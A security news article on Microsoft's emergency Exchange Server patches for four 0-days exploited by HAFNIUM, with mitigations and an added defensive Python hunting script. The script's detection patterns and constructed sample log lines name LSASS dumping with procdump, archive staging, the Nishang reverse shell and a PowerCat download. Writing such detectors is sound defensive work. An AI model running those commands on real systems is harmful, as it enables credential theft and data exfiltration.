Microsoft Pushes Urgent Updates for Exchange Server After the Discovery of Multiple 0-Days

  • Microsoft has fixed several 0-day flaws that Chinese hackers were exploiting.
  • The vulnerabilities were chained together to achieve a high-level compromise, data access, and exfiltration.
  • The actors had been at it for at least two months before the fix, so updating now is urgent.

Microsoft has confirmed the existence of multiple 0-day exploits for Exchange Server that are being actively used by an actor called “HAFNIUM.” This is a hacking group that primarily targets US-based entities and is believed to be state-sponsored and operating out of China.

While Microsoft describes the attacks as limited, they were very damaging: through compromised Exchange servers, the hackers may have accessed email accounts, installed malware, and planted web shell backdoors that give them a persistent foothold from which to move further into the network.

The IDs of the newly discovered 0-days are CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which were addressed in the latest update. The affected MS Exchange Server versions are 2013, 2016, and 2019. The actors chained these flaws together to carry out a powerful attack, which is indicative of their sophistication. Microsoft has also discovered and fixed CVE-2021-26412, CVE-2021-26854, and CVE-2021-27078, but these three aren’t related to the HAFNIUM attacks.

If you’re unable to apply the patch right now, one mitigation is to put the Exchange server behind a VPN so that it is not reachable from the internet. Note that this only blocks the first step of the attack chain, which is establishing an untrusted connection to the Exchange server on port 443, but that may be enough to disrupt it. If the attacker has already compromised your server, though, this mitigation won’t make any difference whatsoever.

As Microsoft details, HAFNIUM performed the following post-exploitation activity:

  • Used Procdump to dump the LSASS process memory
  • Used 7-Zip to compress and exfiltrate stolen data
  • Added and used Exchange PowerShell snap-ins to export mailbox data
  • Used the Nishang Invoke-PowerShellTcpOneLine reverse shell
  • Downloaded PowerCat straight from GitHub and used it to open a remote server connection

Thus, if you are an Exchange server admin, treat the above as signs of trouble and actively scan your log files for these indicators of compromise. If you find ZIP, RAR, or 7z files under C:\ProgramData\, assume your data has been exfiltrated. According to Microsoft, the actors like to download the Exchange offline address book, so they grab organization and user information too.
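The following script is an added example (not from the article, Microsoft, or Volexity) that turns the post-exploitation list above and the C:\ProgramData archive check into a small hunt an admin can run against exported PowerShell or command-line logs. Python is used here so it runs anywhere; the indicator patterns, the sample log lines, and the throwaway directory standing in for C:\ProgramData are all constructed for the demo.

```python
"""Hunt for the HAFNIUM post-exploitation indicators named in the article.

Added example, not the article's or Microsoft's code. The INDICATORS table
mirrors the tools listed in Microsoft's post-exploitation summary; the sample
log lines below are constructed and do not come from a real incident.
"""
import re
import shutil
import tempfile
from pathlib import Path

# (label, pattern) pairs, one per bullet in the article's post-exploitation list.
INDICATORS = [
    ("procdump-lsass", re.compile(r"procdump.*lsass", re.I)),
    # 7-Zip's "a" (add) command creating an archive
    ("7zip-archive", re.compile(r"\b7za?(?:\.exe)?\s+a\s", re.I)),
    ("exchange-snapin", re.compile(r"Add-PSSnapin\s+Microsoft\.Exchange", re.I)),
    ("nishang-reverse-shell", re.compile(r"Invoke-PowerShellTcpOneLine", re.I)),
    ("powercat-download", re.compile(r"powercat", re.I)),
]

# Archive types the article says to treat as evidence of staged exfiltration.
ARCHIVE_SUFFIXES = {".zip", ".rar", ".7z"}

# Constructed sample log (one command per line); lines 2 and 7 are benign noise.
SAMPLE_LOG = [
    r"Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn",
    r"Get-Date",
    r"C:\Windows\Temp\procdump64.exe lsass.exe C:\ProgramData\lsass.dmp",
    r"C:\ProgramData\7z.exe a C:\ProgramData\oab.zip C:\ProgramData\oab",
    r"Invoke-WebRequest https://example.invalid/powercat.ps1",  # placeholder URL
    r"Invoke-PowerShellTcpOneLine",
    r"Get-Service MSExchangeIS",
]


def match_indicators(lines):
    """Return (line_number, label, line) for every log line matching an indicator."""
    hits = []
    for number, line in enumerate(lines, 1):
        for label, pattern in INDICATORS:
            if pattern.search(line):
                hits.append((number, label, line.strip()))
    return hits


def find_archives(root):
    """Return paths of ZIP/RAR/7z files anywhere under root (e.g. C:\\ProgramData)."""
    root = Path(root)
    return sorted(
        str(p) for p in root.rglob("*")
        if p.is_file() and p.suffix.lower() in ARCHIVE_SUFFIXES
    )


def demo_archive_scan():
    """Build a throwaway directory standing in for C:\\ProgramData (constructed),
    plant one archive at the top level, one in a subfolder and one harmless file,
    and return the names find_archives flags."""
    root = Path(tempfile.mkdtemp(prefix="programdata-"))
    try:
        (root / "it.zip").write_bytes(b"PK\x03\x04")
        (root / "sub").mkdir()
        (root / "sub" / "oab.7z").write_bytes(b"7z")
        (root / "readme.txt").write_text("harmless")
        return [Path(p).name for p in find_archives(root)]
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for number, label, line in match_indicators(SAMPLE_LOG):
        print(f"line {number}: {label}: {line}")
    print("archives found in demo directory:", demo_archive_scan())
```

To use it against a real host, feed `match_indicators` the lines of your exported PowerShell operational or script-block logs and call `find_archives(r"C:\ProgramData")`; a hit on any indicator, or any archive under that path, is a reason to start incident response rather than a conclusion on its own.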

If you find that you’re already under attack by HAFNIUM, check out this piece to figure out how to build effective defenses. The most urgent action to take right now, though, is to update all externally facing Exchange Servers.

Finally, according to a blog post by Volexity researchers, who were the ones to discover these attacks and report them to Microsoft, the first signs of active exploitation of the aforementioned flaws appeared as far back as January 6, 2021.
